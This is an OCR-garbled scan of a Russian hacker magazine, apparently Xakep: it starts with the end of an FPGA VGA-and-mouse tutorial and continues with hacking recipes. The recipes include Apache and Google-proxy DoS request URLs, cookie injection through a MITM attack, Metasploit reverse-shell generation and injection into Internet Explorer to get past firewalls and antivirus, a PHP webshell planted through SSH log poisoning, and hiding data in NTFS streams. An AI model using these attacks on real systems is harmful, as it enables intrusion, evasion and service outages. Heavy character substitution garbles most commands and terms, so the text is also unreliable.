ЫІРТН = 8; количество бит в каждом слове 



АРРКЕ55 КАРІХ = ЦМ5; формат представления адреса 



РАТА 


КАРІХ = ВІИ 


: формат представления данных 


СОІМТЕІМТ ВЕСІМ - 


_ 


начало данных 




00 : 


00000000 : 


_ 


- значение по адресу 0 


01 : 


00000001: 


_ 


- значение по адресу 1 




ЕШ: 


окончание 


данных 



В качестве формата представления адреса и данных можно ис- 
пользовать следующие значения: 

• В I N — бинарный; 

• НЕХ — шестнадцатеричный; 

• ОСТ — восьмеричный; 

• РЕС — десятичный, знаковый; 

• I) N5 — десятичный, беззнаковый . 

Создав файл, я столкнулся со следующими граблями — для нас что 
«1», что «00000001» — одно и то же, а для Акега ѴѴеЬ Есііііоп — разные, 
поэтому долго не мог понять, почему не инициализируется память. 
Никаких предупреждений при этом не выдавалось. Поэтому, если ты 
указал, что разрядность данных равна 8, восемьзнаков и набивай. 

Осталось только указать нашему модулю памяти файл инициа- 
лизации. Опять заходим в М едаѴѴіга гсі, но на этот раз указываем, 
что хотим редактировать существующий экземпляр (выбираем «Есііі 
ап ехізііпд сизіогті теда^ипсііоп ѵагіаЫез»). На следующем шаге 
указываем созданный ранее файл и жмем Ыех{, пока не доберемся до 
шага инициализации памяти (рис. 3). Выбираем, что хотим инициа- 
лизировать память (Уез, изе {Ыз ЛІе {ог {Не тетогу сопіепі: сіаіа) и 
указываем наш файл. Заканчиваем, на этом объект полностью готов 
к использованию в нашем проекте. 

Модуль для формирования ѴСА-сигнала (ѵда_тосІиІе) 

Вот мы и подошли к самому главному! Ничего сложного в нем нет, 
но для понимания давайте разберем алгоритм, который я применил. 
Итак, длина одной строки — 80 символов. Когда выводятся данные 
первого символа, мы вычисляем данные для второго; дошли до 80-го 
символа — вычисляем данные первого символа следующей строки; 
дошли до конца экрана — вычисляем первый символ первой строки. 

Что за данные я имею в виду? Это отображение кода символа 
на шрифт в зависимости от положения на экране. Чтобы было по- 
нятнее, разберем на примере первой строки. У нас есть строка — 80 
символов. Начинаем выводить ее из левого верхнего угла — то есть 
луч бежит по первой линии из 480, и нам необходимо подготовить 
данные для второго символа. Берем код символа и умножаем на 12 
(количество байт в шрифте на каждый символ). Так мы получаем 
смещение, от которого начинается битовая матрица символа. На 
первой линии мы возьмем байт, начинающийся со смещения, на 
второй линии — следующий байт (смещение + 1) и т. д. Когда мы 
выведем все 12 линий первой строки, беремся за следующую и по- 
вторяем все сначала. 

Подготовка данных происходит в несколько шагов (найди в мо- 
дуле места, где используется переменная {іск_соип{ег, сразу станет 
понятнее). 

• Напервомшаге ({іск_соип{ег== 1) высчитываем адрес символа, 
который надо отобразить. 

• На втором шаге (ііск_соип{ег==3; пропустили одинтакт, чтобы мо- 
дуль памяти успел выставить да иные) — высчитываем смещение в 
шрифте. 

• На третьем шаге ({іск_соип{ег== 5) заносим данные в переменную 
{етр. Когда {іск_соип{егстанетравен 8, содержимое {етр'а зане- 
сем в переменную сЫа_{ог_5сгееп, откуда оно и начнет отобра- 
жаться на экране. 

• На четвертом шаге ({іск_соип{ег== 6) кадресу символа прибавляем 
единицу, чтобы получить адрес цвета символа и его фона. Требуе- 
мые данные будутхраниться в сЫа, и мы, когда будем обновлять 
ба1:а_{ог_5Сгееп, обновим и переменную {оп{. 
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Монитор к каждой железке! 



Теперь надо распечатать модуль и понять, как этот алгоритм 
реализован. Но предварительно лучше, конечно, пойти погулять и 
проветрится. Я в этом модуле вроде как все знаю, но и то задымился, 
пытаясь объяснить! 

Почти все... 

После написания всех модулей, нам необходимо их соединить в одно 
целое. Можно сделать это отдельным модулем, но мне предпочтитель- 
нее графический способ. В Ргоіесі: Маѵіда^ог выбираем вкладку Рііез, 
на каждом модуле щелкаем правой клавишей мыши и выбираем пункт 
Сгеа^е БуппЬоІ Рііез {ог Сиггеп* Рііез — тем самым мы создаем заготовку 
для графического дизайна. После этого выбираем РіІе-^Ыеѵѵ и среди 
множества вариантов находим ВІоск Оіадгат/БсНеппаііс Рііез. 

В получившемся эскизе найди кнопку БутЬоІ іооі (значок в виде 
розетки) и нажми его — появится окно, в котором можно выбрать 
наши заготовки. В левой части окна открой папку с проектом, щел- 
кни один раз на модуле — в правой части появится изображение, на 
котором ты увидишь модуль с входами/выходами. Если все нормаль- 
но, жми ОК и помещай модуль в рабочее пространство. Далее моду- 
ли надо соединить между собой — подводишь мышку к нужному вхо- 
ду/выходу — курсор меняется на своеобразный прицел, зажимаешь 
левую клавишу и ведешь, куда требуется. Ничего сложного здесь нет. 

Получившийся результатты можешь видеть на картинке 4. 

А как в качестве входа/выхода указать физическую ножку ПЛИС? 
Для этого найди выпадающий список Ріп ТооІ и выбери, в каком 
качестве нога будет использована: вход, выход или двунаправлен- 
ная. Получившийся значок помести на схему и зайди в его свойства, 
где измени имя на требуемое. После этого соедини его с нужным 
модулем вышеописанным способом. 

Но и еще не все! Выбираем Аззідтеп^з-^Ріп РІаппег и в появив- 
шемся окне делаем окончательную доводку. Внизу будут перечислены 
все наши входы/выходы с теми именами, которые мы задали. Рядом с 
каждым из них в поле І_оса1:іоп указываем требуемую ножку ПЛИС. 



ПРОШИВКА ПЛАТЫ 



Теперь, когда все позади (а если ты въехал в алгоритм, тебя мирские 
дела уже не интересуют), осталось прошить плату. Втыкаем програм- 
матор в ІІБВ-порт компьютера и в ЛА6-разъем на плате. Драйвера для 
программатора смело ищи в установочной папке АКега (опять отсылаю 
к ресурсу тагзоНоб.огд, где все подробно расписано). После установки 
программатора вызываем Тооіз -> Ргодгаттег, где осталось указать, 
что мы пользуемся ЛА6 и какой у нас программатор (Нагбѵѵаге Беіир). 
Жмем Біагі: — и наша программа уже находится в памяти платы. 

Чтобы проверить работоспособность, нужно кабелем Р5-232 (он 
тоже был в комплекте) присоединить плату к компьютеру, запустить 
НурегТегтіпаІ с настройками 1 1 5200:8п:2 и начать печатать, помня, 
что один байт идет на символ, а другой на атрибуты. Чтобы было 
удобнее пробовать, я написал простенькую программу для вывода 




текста — запускаешь и начинаешь печатать, меняя, при необходимо- 
сти, цвет фона и текста. 

Ну вот, теперь ты можешь смело пригласить свою боевую под- 
ругу, для которой выражение «кварц на 12 МГц» не является пустым 
звуком, и показать достигнутый результат! Но если что-то мешает 
пригласить подругу к себе (родители или жена), вышеописанный 
способ прошивки не подойдет — программа сотрется сразу после вы- 
ключения питания. В этом случае поступаем так. 

Заходим в Рііе -> Сопѵегі Ргодгаттіпд Рііез. В появившемся окне 
делаем следующие настройки: 

1. Из выпадающего списка Ргодгаттіпд Ѵ \ I е Іу ре выбираем ЛА6 
Іпбігесі: СопЛдигаІіоп Рііе (діс). 

2. Из списка СопЛдигаііоп Беѵісе выбираем ЕРС51 — и мен но этот 
конфигурационный чип стоит у нас на плате. 

3. Если есть необходимость, можноуказать имя выходного файла. 

4. В разделе Іприі: Рііез іо сопѵегі выделяем строку РІазИ І_оа бег, жмем 
АсІсІ Оеѵісе... иуказываем наш Сусіопе. 

5. Выделяем строку БОР йа^а Раде_0, жмем АсІсІ Рііез и выбираем 
файл конфигурации с расширением .зо{ — он должен находиться в 
папке с проектом. 

6. Когда указанный файл появится в списке, выбери его и нажми 
кнопку Ргорегііез. Свойств не густо — всего одно, зато нужное: 
Сотргеззіоп! Ставим галочку для подтверждения. 

7. Жмем Оепега^е. 

8. Опять запускаем программатор, жмем Аб б Рііе и выбираем создан- 
ный нами файл с расширением дсс. 

9. Ставим галочки Ргодгат и Ѵегі^у и наконец-тожмем старт. 

После перезагрузки платы стартует наша программа! 



КУДА ЖЕ МЫ БЕЗ МЫШИ? 



Уже почти хотел закончить статью, но, глядя на экран с символами, 
понял, что не хватает мыши!Унасже есть для нее разъем! Остальное 
оказалось делом техники. 

По ссылке доо.д1/РУз|а ты можешь скачать модуль для работы с 
мышью МоизеРе^Сотр. В составе скачанного архива есть хороший 
мануал для работы с модулем, так что никаких вопросов не возник- 
ло! Более того, модуль уже выдает информацию в виде положения 
курсора мыши на экране 640x480. 

Сначала изменим описание модуля Ѵ6А — добавим два входа X и 
У — это будут координаты мыши. А сама отрисовка курсора займет 
всего од ну (!) строчку: 

і-р ( (ПпесоштЕ == ѵтоизе) && (1е1:1:ег_аббге55/2 == 

хтоизе) ) -РоггЕ = 255; еізе -РогтЕ = баііа; 

Ее мы добавляем после строки 1:іск_соипІег = 0. 

Добавляем модуль МоизеРе^Сотр в проект и настраиваем его на 
нашу частоту в 50 МГц (по умолчанию стоит частота 100 МГц) — в фай- 
ле рз2іп*ег{асе увеличиваем в 2 раза значения констант ОЕІ_АѴЮ01І5, 
ОЕІ_АѴ201І5, ОЕІ_АѴ63СІ_К и ОЕВОШ\ІСЕ_ОЕІ_АѴ. Теперь модуль готов 
к работе! Осталось поместить его в нашу графическую сборку путем, 
описанным выше, и соединить с модулем Ѵ6А. Теперь, глядя на экран 
с символами и бегающей мышкой, можешь смело уверять окружаю- 
щих, что полноценный компьютер вот-вот на подходе :)! 



НАПОСЛЕДОК 



Как видишь, дружище, ничего сложного в ПЛИС'е нет! То, что было 
проделано, лишь малая толика того, что еще можно смастерить. На- 
вскидку, могу предложить реализовать графический режим, используя 
внешнюю память в 1 Мбит. Можно подцепить клавиатуру, организовать 
обмен по 5РІ с мощным микроконтроллером, к которому подсоединить 
внешнее хранилище данных, например, зб/ттс карточку. А моя шутка 
про компьютер вполне может стать реальностью. Реальной пользы 
будет немного, зато микроконтроллеры всем на зависть выучишь. Стив 
Джобс тоже начинал с малого. Главное, поверь в себя и тоже начни с 
малого. А если захочешь подглядеть на то, как это сделано у меня, то 
ищи все проектные файлы на БѴБ или по ссылке аоо.аІ/МУІеР . ИНИ 
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ВЗЛОМ/ ЕА5ѴНАСК 



Тюрин «ЭгеепРод» Алексей, ОідііаІ Бесигііу (іѵѵіНег.сот/апІуигіп) 





ЗАДАЧА 



РЕШЕНИЕ 

При слове «00о5» сразу вспоминается август, который оказался 
на редкость скандальным по части атак, связанных с отказом в 
обслуживании. Новости особенно пестрили заголовками о дырке в 
АрасНе. Неудивительно, ведь речь идет о йОоб'е всех основных веток 
веб-демона, 60% ресурсов которого были установлены в Сети. 

Под проблемку с гапде’ем к АрасНе быстро появился целый пучок 
сплойтов в различных вариациях. Правда, для пентестерских целей 
более интересной оказалась наработка в виде скрипта к птар'у — 
Шр-ѵиІп-сѵе2011-3192.П5е (доступна на официальном сайте]. Не 
заваливая весь ресурс, она проверяет его дырявость. 

В августе был выложен еще один любопытный скриптик, реали- 
зующий 00о5 через боодіе [ доо.дІ/Ц9сЗК І. Если по порядку, то ребята 
из ІШеат нашли пару дырок в сервисах Гугла и сообщили об этом куда 
следует, но им по каким-то причинам не ответили. И, как это водится в 
околохакерских кругах, информация быстро попала в паблик, да еще 
вместе с утилитой, которой многие не поленились воспользовать- 
ся. Баги были по своей сути простые: через сервисы боодіе можно 
подгрузить контент с любого сайта. Прилагаемая тулза занималась 



как раз тем, что инициировала множество запросов через серверы 
поисковика, от чего атакуемый сайт падал под ООоБ'ом. Для усиления 
и ускорения выноса сайта предлагалось в качестве «контента» для 
загрузки выбрать файлик побольше и сбрасывать соединение при 
ответе от боодіе. Ситуация еще более усугублялась тем, что в логах 
атакуемого сайта фиксировались ІР-адреса поисковой системы. Таким 
образом, атакуемый был, по сути, анонимен, и мог проводить всякие 
бОБ-инъекции, не опасаясь, что его вычислят. Примеры: 

1. Іт1=1=р5 : / / ріиз . §оо§1е. сош/_/5ІіагеЬох/ 
1іпкргеѵіем/?с=<5ІТЕ>&1:=1&_геяігі=<КАМ00М^иМВЕК5>&г1:=д 

2. ІтЬ'Брз ://іта§е52--Роси5-ореп50сіа1.§оо§1еи5егсоп1:еп1: . 
сот/§асІ§е1:5/ргоху?иг1=<5ІТЕ>&соп1:аіпег=-Роси5 

Здесь <5ІТЕ> — имя атакуемого сайта, <КАМРОМ_І\ІІІМВЕК5> — 
случайное число. Подробности и видеодемонстрация доступны по 
линку доо.а1Лб7Р1 . Интересно, что после публикации тулзы ІЖеат 
специалисты боодіе быстро связались с авторами, извинились за не- 
расторопность и, само собой, пофиксили все баги. 



Шш ЧргЛ\ЕВ8\Ъе1:а,_ге 1еайе>плдр -йсі ц ір!;=Ы:Ьр-уи1п-сиеЯЙ11-Зі9Й ' -рТ :8П 

5_5І С №±р ;.//пітілр . оі^у > 2011-99—12 10 :53 Низзіап ЗіаосІагД Тігое 

Мгоар асап герог* Рог і У 

ПоеЬ і'С ир <0.00І9 е 1а^епсу>. 

РОЯГ ЗТЙТЕ ЗЕВУ I СЕ 
80 /%ср ореп 

\ ЬЬір-ииІп-сие2011“319Я - 

І!_ Йрасііе Ъуйегапде ГіІЬер ГоЗ - ІШЬНЕКйВЬЕ 

Мпар Лопе: 1 1Р агійгезз <1 ЪаѣЪ ир> зсаппЫ іп І.80 



Хе-хе-хе. Кто-то не успел пропатчиться 
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ЕА5Ѵ НАСК 



ПОДМЕНИТЬ КУКИ БРАУЗЕРА 



ЗАДАЧА 



РЕШЕНИЕ 

Уже пару номеров мы занимаемся изучением атак на клиентов, рабо- 
тающих по защищенному НТТРБ-соединению, изыскивая возмож- 
ность украсть куки. В продолжение темы посмотрим на достаточно 
интересное поведение браузеров при наложении кукисов из разных 
протоколов (НИР и НТТР5) и такое важное поле куков как «ботаіп». 

Если обратится к теории, то поле «ботаіп» используется для 
задания отдельного домена или группы, куда впоследствии будут 
отправляться куки. По идее, домен должен иметь право ставить куки 
только на себя. То есть домен ехатріе.сот не может ставить на поддо- 
мены (ѵѵеЬ.ехатрІе.сот) или другие домены (ехатрІе2.сот). Так оно и 
есть. Но есть интересная возможность — выставить куки для домена 
более низкого уровня (а точнее для группы). Поясню на примере: ѵѵеЬ. 
ехатріе.сот может поставить куки для ехатріе.сот. Или, в случае с 
подгруппой, куки, поставленные на ехатріе.сот, будут отправляться 
и на ѵѵеЬ.ехатрІе.сот. Запомним это и перейдем к поведению браузе- 
ров на различных протоколах. Как мы знаем, куки, установленные по 
НТТР5 с флагом «Бесиге», будут передаваться только по защищенно- 



му каналу. Но вот что интересно: ведь по НТТР мы так же можем задать 
куки. А что будет, если задаваемые куки будут иметь одинаковые 
имена (а также домены и пути)? Правильный ответ- куки будутзаме- 
няться. Таким образом, проведя какую-нибудь МІТМ-атаку на жертву, 
можно заставить ее инициировать НТТР-соединение к серверу и 
подставить в заголовок ответа от него поле — «БеЕСоокіе» с вредо- 
носными данными. И это заменит куки от защищенного соединения! 
Для чего это все может пригодиться? Если исключить специфические 
ситуации, то обе эти особенности браузеров позволяют проводить ата- 
ки на клиентов. Конкретно в том случае, когда на атакуемом портале 
находится уязвимость «5еззіоп Лхаііоп» (то есть отсутствие смены 
идентификатора пользователя после его входа в систему), но при этом 
отсутствует возможность воздействовать на ответы от сервера кли- 
енту. Кто-то может заметить, что баги этого класса достаточно редки. 
Но как раз недавно я нашел такую достаточно крупном зарубежном 
сайте. По статистике, подобным недугом страдают многие ресурсы 
(особенно интернет-магазины), где предусмотрена возможность вы- 
полнять какие-то действия до входа в систему. 



ИНЪЕКТИРОВАТЬ СВОЙ КОД 
В ПРОИЗВОЛЬНЫЙ ПРОЦЕСС 



ЗАДАЧА 



РЕШЕНИЕ 

Если взять современный файрвол, то уже это уже не просто про- 
грамма для блокировки входящих и исходящих портов. Бранд- 
мауэры проверяют, какое именно приложение пытается выбраться 
через те дырочки, которые остаются открытыми в системе. Усло- 
вимся с задачей. Допустим, мы имеем пользовательский доступ 
к серверу в какой-то закрытой сети и нам интересно атаковать 
соседние хосты. Первым делом, конечно же, требуется определить 
правила файрвола и какие приложения разрешены. Если есть воз- 
можность — смотрим сами политики плюс статистику соединений 
(пе* *з*а1: -пао). После обнаружения приложений и доступных им 
портов требуется осуществить «подмену». То есть нам нужно, 
чтобы фаер думал, что это легальная программа биндит порт, а не 
наша зло-утилита :). 

Старыми, но но действенными способами обхода таких фаеров яв- 
ляются собе и сііі-іпіесііоп. По сути, данными техниками мы изменяем/ 
добавляем функционал для существующего легального ПО. Что еще 
интереснее, мы можем делать это «на лету», то есть изменить процесс, 
находящийся в памяти. Конечно, для этого на запущенный процесс 
у нас должны быть определенные права. Кроме того, надо иметь в 
виду, что некоторые продвинутые системы безопасности мониторят 
подобную активность. Как именно происходит инъекция, я не буду 
объяснять — в Сети все хорошо расписано. Перейдем к практике. 

Тулзов, реализующих инъекции, очень много. Сегодня мы 
посмотрим зугіпде ( ЬіСІѵ/І8С1ЕЗР ]. У нее есть интересная возмож- 
ность — она умеет работать с шеллкодом, который был сгенерирован 
в тз^рауІоасБ Если точнее, то с тем, что получен с аргументом аІрНа_ 
тіхеб. Последний используется во-первых для того чтобы пэйлоад 
не задетектили антивирусы, а во-вторых чтобы иметь возможность 
отобразить пэйлоад в виде текстовой строки. Бугіпде — это аналог 
утилиты зЬеІІсосІеехес (мы о нем уже писали), но позволяющий 
проделать инъект пэйлоада не только в себя, но и в почти любой про- 
цесс. Имея в запасе такую тулзу, мы можем вырваться из системы. 

Рассмотрим пример. Мы определили, что у Іпіегпеі Ехріогег'а есть 
возможность выхода в Сеть. Попробуем проинжектить, к примеру, 
теІегрге1:ег в запущенный ІЕ и организовать соединение с любым 
хостом. На практике это будет выглядеть примерно так: 



1. Генерим необходимый нам те*егрге*ег геѵегзе-шеллкод и коди- 
руем его в правильном виде: 

. /тз-рраѵіоасі ѵѵіпсІоыБ/теІіегргеІіег/геѵегБе 1:ср 
ЕХІТРІЛ\ІС=1:ІігеасІ БРОКТ=5555 І_НО5Т=192.168.0.1 К 
| . /тз-РепсосІе -а х8б -е х86/а!рИа шіхесі -1: паѵѵ 

Ви-р-РегКе§І5І:ег=ЕАХ 

2. Открываем у себя порт, чтобы принимать коннект отжертвы: 

. /тз-РсІі тиІЕі/ІіапсІІег РАУ10АР=ѵѵіпбоѵѵ5/те1:егрге1:ег/ге 
ѵегзеЕср ЕХІТГЦІМС=ЕІігеасІ БРОКТ=5555 БН05Т=192 .168.0 .1 Е 

3. Ну, а далее — инжектим шеллкод в необходимый нам процесс (ІЕ): 
зугіп§е.ехе -2 РѴІІІІІІІІІІ...1Ѵ5ѴХЕРАА РЮ_ІЕ 

Здесь: 

• РѴІІІІІІІІІІ...1Ѵ5ѴХЕРАА — это сгенерированный нами шеллкод; 

• РЮ_ІЕ — идентификатор процесса іехріоге.ехе (можно увидеть в 
Ііазкііз*); 

• -2 — режим работы зугіпде.ехе для инъекции шеллкода в сто- 
ронний процесс. 

Подсаженный в ІЕ код -«первая ступень» те1:егрге*ег'а, которая 
исполнится и подконнектится к нашему серверу, после чего подгру- 
зятся другие модули. Далее, имея на руках теіегргеііег, мы свободно 
можем развить атаку и на соседние хосты, используя возможности 
роутинга. И все это в обход файрвола и антивируса :). 

Стоит отметить, что у Бугіпде есть другие режимы работы. Если 
использовать «-3», то зугіпде будет инъектировать сам в себя (то 
есть будет работать как збеіісосіеехес). Режим «-1» тоже интере- 
сен, он инъектирует в сторонний процесс йБЕку, что может быть 
полезно. Как мы знаем, с помощью тз^рауіоасі мы можем сгенери- 
ровать йБЕку с необходимым нам пэйлоадом. Другими словами, это 
альтернативный вариант, правда, он хуже первого, так как йБЕки в 
основном мониторятся и палятся антивирусами на уровне ФС. 
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ВЗЛОМ/ ЕА5ѴНАСК 



ПОЛУЧИТЬ ДОСТУП КѴѴЕВ-СЕРВЕРУ, 
ИМЕЯ ЬН-УЯЗВИМОСТЬ В СКРИПТЕ 



ЗАДАЧА 



РЕШЕНИЕ 

І_РІ (І_осаІ Рііе Іпсіизіоп) — достаточно распространенная дырка, 
присущая скриптовых языкам, а потому широко распространенная в 
Сети. Как известно, скриптовые языки позволяют на лету подгружать 
в начальный сценарий другие сценарии, что часто используется про- 
граммистами. 

Проблема, как это обычно бывает, кроется в недостаточной 
проверке пользовательского ввода. Как подтип инклуда, І_РІ по- 
зволяет подгрузить контенттолько с того же хоста (в отличие от РРІ). 
Но подгрузка скриптов — еще не выполнение команд на сервере. 
Классический способ перейти кудаленному выполнению команд — 
добавить какой-то код в файл на сервере, а потом подгрузить данный 
файл через І_РІ. Чаще всего используются логфайлы веб-сервера. 

Отправляем на сервер запрос с необходимым кодом, он сохра- 
няется в журнале — и мы его подгружаем. Но трюк этот достаточно 
старый. Что есть новенького? Могу предложить «вариацию на тему» 
с использованием логов авторизаций ЗЗН-сервера. 

Если на атакуемом сервере есть демон ОрепЗЗН, то мы можем 
подключиться к нему, указав в качестве имени пользователя не- 
обходимый нам код. А далее как обычно: подгрузить его инклудом. 
Файл логов обычно лежит в /ѵаг/Іод/аиіИ.Іод и, что важно для нас, по 




Вводим код вместо логина 

умолчанию часто доступен для чтения всем. Пробуем авторизиро- 
ваться на тестовой машине, используя знакомые команды: 

<?рІір еѵа1Х$_СЕТ[стсІ]); ?> 

В итоге получаем запись в логах, которую мы можем инклудить. 
Стоит отметить и недостатки этого способа. Во-первых, логфайл не 
всегда доступен инклуду (по разным причинам), а во-вторых, пере- 
даваемая команда выполниться трижды, так как записей от одного 
коннекта будет целых три. Кстати говоря, в самом файле логов 
частенько хранится интересная инфа, которая может позволить раз- 
вить атаку на другие машины локальной сети. 
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Наш код в логах 

СПРЯТАТЬ (И НЕ ТОЛЬКО! ФАЙЛЫ В ЫТР5 



ЗАДАЧА 



РЕШЕНИЕ 

Простейший способ спрятать какую-то информацию в ІЧТР5 — по- 
ложить ее в альтернативный поток (АКегпаІііѵе Оа1:а Зітеат, далее 
АйЗ). Трюк стар как сам мир: ему уже более 15 лет. Те бородатые 
дядьки, кто программировал в те годы, подтвердят, что эта возмож- 
ность была добавлена в файловую систему для совместимости с 
системой яблочников. 

Сейчас альтернативные потоки создаются редко. Кратко про- 
бегусь по основным тонкостям и примерам использования скрытых 
потоков. Во-первых, когда создается файл в системе, данные запи- 
сываются в стандартный поток $ОАТА. Любой, даже «бесправный», 
пользователь может создавать дополнительные потоки к файлам, 
причем даже к тем, к которым у него прав, по сути, нет. Во-вторых, 
информацию в потоках можно не только хранить, но и запускать. 
Далее, потоки можно создавать как к файлам, так и к каталогам 
(хотя из последних запустить файл не получится). В-четвертых, 
размер настоящего файла не меняется, а проводник не отобра- 
жает дополнительных потоков. В-пятых, при пересылке файлов, 
например, по почте или на флешку, копируется только стандартный 
поток. То есть мы имеем достаточно лайтовый способ для сокрытия 
инфы, например, на работе. Малварь этим способом тоже пользует- 
ся, но для антивирусов АйЗ давно не проблема. Теперь практиче- 
ские примеры. 

Записываем текст в дополнительный поток - БесгеѣБ.ѣхІ: 

есііо "зоте зесге^Б" > “Ьез'Ь.ЪсЕіБесге'ЬБ.Ъс'Ь 



□3 -дмінпістратср. С: м 
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; файл Ораш Енд ЁСт|ви Формат Сервис |айлнца 
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Читаем дополнительные потоки, используя ссылки 

Читаем текст из потока зесгеѣБ.ѣхІ: 

тоге < ’ЕеБ'Е.ЪсЕіБесге'ЕБ.'ЕхІ: 
поііерасі.ехе 'Еез'С.ЪсЕізесге'Сз.'ЕхІ: 
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